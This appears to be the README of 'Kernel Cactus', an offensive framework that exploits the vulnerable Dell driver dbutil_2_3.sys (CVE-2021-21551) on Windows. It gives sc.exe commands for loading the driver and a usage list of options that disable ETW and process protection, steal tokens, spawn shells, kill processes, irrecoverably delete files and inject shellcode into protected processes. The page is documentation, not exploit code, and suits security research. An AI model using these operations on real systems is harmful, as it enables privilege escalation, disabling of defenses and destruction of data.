Home

Awesome

Kernel-Cactus

It's pointy and it hurts!

Kernel Cactus is a C written framework to utilize perform attacks on Windows OS while utilising CVE-2021-21551 (dbutil_2_3.sys).

Description

Please Read our full article to further understand the ins and outs of all the offensive and defensive code in this repo.

Pre - Reqs

In order for Kernel Cactus to work it is required that you will have Dbutil_2_3.sys installed and its service started. how to do so? its your choice really. anything from sc.exe to 3rd party driver loaders is good. you can use:

sc.exe create dbutil_2_3 binpath= C:\path\to\dbutil_2_3.sys type= filesys

sc.exe start dbutil_2_3

Disclaimer

This is a new framework still mostly at POC level for abusing CVE-2021-21551. As such, this framework tempers with danegrous variables in the kernel , which may cause BSOD from time to time. USING THIS IN PRODUCTION ENVIORNMENT IS RISKY! use it with all the cuation you can! Fixes to stabilize possible BSOD's will come in the next update, although its mostly safe to use at the moment. if you are not familiar with the nature of this CVE please reffer to https://spikysabra.gitbook.io/kernelcactus/.

Offsets

in order to use KernelCactus.exe you first must extract the offsets of your Ntoskrnl.exe in order to do so we have included Radare debugger and a python script. first copy the contents of Radare to your desired path, and add that path th PATH enviornment variable.

After that use the python script like so:

python offsetExtract.py -i <your exe> 

after you receive your CSV file , place it in the same dir of KernelCactus.exe and run it :)

Usage

--help								Display usage 

--etw 0/1							Disable/Enable ETW

--ppl PID 0/1							Disable/Enable PPL from any process 

--terminate	PID						Terminate single Process:
								this is aimed mostly for protected processes. 
								but will work for any process that provieds you with PROCESS_QUERY_LIMITED_INFORMATION in its ACL.
							        (in case you do not hold such right, you are more then welcome to use '--token PID current --terminate PID in order to recive one :D )

--delete PATH							Delete any file that provides you with ANY handle access ;)


--token srcPID dstPID						copy a token via kernel from one process to another. works both on local AND domain purposes ;)
								(use 'current' on dstPID in order to change the current process token)

--tokenspawn PID						spawn a new CMD shell with the chosen process token.						

--destroyservice path\to\pids.txt path\to\files.txt		WARNING, USE WITH RESPONSIBILLITY!
								ALL FILES DELETED ARE NOT RESTORABLE, MAKE A COPY PRIOR TO DELETING IF YOU NEED TO...
								Will kill all processes in pid list (line seperated) 
								Will delete all Files in the File list (line seperated)
								this module is aimed for services that own a WatchDog service. 
								deleting and killing all files is only in case that the lowest handle access
								is available to you by ACL, so again feel free to use --token to elevate privs. 

--tinject PID \path\to\shellcode				Perform RemoteThreadInjection to any process that provides you ANY handle , including protected processes 

--thijack PID \path\to\shellcode				Perform ThreadHijacking via kernel operations to any process that provides you ANY handle , including protected processes 
									
(shellcode must be in binary format )

Authors

Itamar Medyoni (@T045T3) Matan Haim Guez (@0xs0ns3)

TODO

Honorable Mentions